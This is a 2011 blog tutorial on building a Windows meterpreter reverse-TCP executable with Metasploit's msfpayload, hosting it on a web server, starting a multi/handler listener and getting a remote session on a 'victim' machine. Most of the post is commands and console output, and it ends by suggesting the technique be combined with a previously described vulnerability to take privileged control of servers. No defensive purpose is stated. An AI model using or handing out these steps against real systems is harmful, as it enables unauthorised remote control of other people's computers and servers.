Wednesday, June 22, 2011

Metasploit Binary Payload

Once again we are going to start off simple. We are going to use Metasploit to make a Binary Payload using a reverse tcp meterpreter session. First we are going to export Metasploit meterpreter to a file. We do this via the following command. The LHOST will be your computer’s IP address for the victim knows where to connect back to. We are going to redirect the output of the command to a file named meterpreter.exe in the root of my http server for simplicity.

[root@localhost app]# ./msfpayload windows/meterpreter/reverse_tcp LHOST= x.x.70.197 X >/var/www/html/meterpreter.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: {"LHOST"=>"10.10.13.247"}
Next we are going to give the file rw permission
[root@localhost app]# chmod 665 /var/www/html/meterpreter.exe
Now on the attacking box we need to set up a meterpreter listener.
[root@localhost app]# ./msfconsole
=[ metasploit v3.7.1-release [core:3.7 api:1.0]
+ -- --=[ 687 exploits - 357 auxiliary - 39 post
+ -- --=[ 217 payloads - 27 encoders - 8 nops
=[ svn r12635 updated 37 days ago (2011.05.16)

Warning: This copy of the Metasploit Framework was last updated 37 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
http://www.metasploit.com/redmine/projects/framework/wiki/Updating

msf > use multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST x.x.70.197
LHOST => x.x.70.197
msf exploit(handler) > exploit
[*] Started reverse handler on x.x.70.197:4444
[*] Starting the payload handler...

Next run the executable on the victims computer (I’ll show a better way to do this later down the road).

[*]Transmitting intermediate stager for over-sized stage…(89 bytes)
[*]Sending stage (2834 bytes)
[*]Sleeping before handling stage…
[*]Uploading DLL (81931 bytes)…
[*]Upload completed.
[*]Meterpreter session 1 opened (x.x.70.197:4444 -> x.x.200.252:1227
meterpreter >

This has a lot of possibilities if you want to compromise a server you can find one that was vulnerable to my last post. Put in a file that gives you command line access to the server and run the executable on the server itself. This way, get a privileged session to the entire server as opposed to a directory if it is jailed.
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)